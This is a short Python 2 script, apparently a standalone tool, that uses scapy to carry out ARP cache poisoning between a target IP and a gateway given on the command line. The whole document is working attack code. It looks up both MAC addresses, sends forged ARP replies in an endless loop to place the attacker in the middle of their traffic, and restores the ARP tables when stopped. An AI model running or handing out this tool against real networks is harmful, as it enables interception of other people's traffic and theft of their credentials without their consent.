from scapy.all import *
def getmac(targetip):
arppacket = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip)
targetmac = srp(arppacket, timeout=2 , verbose= False)[0][0][1].hwsrc
return targetmac
def spoofarpcache(targetip, targetmac, sourceip):
spoofed = ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac)
send(spoofed, verbose= False)
def restorearp(targetip, targetmac, sourceip, sourcemac):
packet = ARP(op=2 , hwsrc=sourcemac , psrc= sourceip, hwdst= targetmac , pdst= targetip)
send(packet, verbose=False)
print "ARP Table restored to normal for", targetip
if len(sys.argv) != 3:
print "Usage: arp_poisoning.py targetIP getwayIP"
exit(1)
targetip = str(sys.argv[1])
gatewayip = str(sys.argv[2])
targetmac = getmac(targetip)
print "Target MAC", targetmac
gatewaymac = getmac(gatewayip)
print "Gateway MAC:", gatewaymac
try:
print "Sending spoofed ARP responses"
while True:
spoofarpcache(targetip, targetmac, gatewayip)
spoofarpcache(gatewayip, gatewaymac, targetip)
except KeyboardInterrupt:
print "ARP spoofing stopped"
restorearp(gatewayip, gatewaymac, targetip, targetmac)
restorearp(targetip, targetmac, gatewayip, gatewaymac)
quit()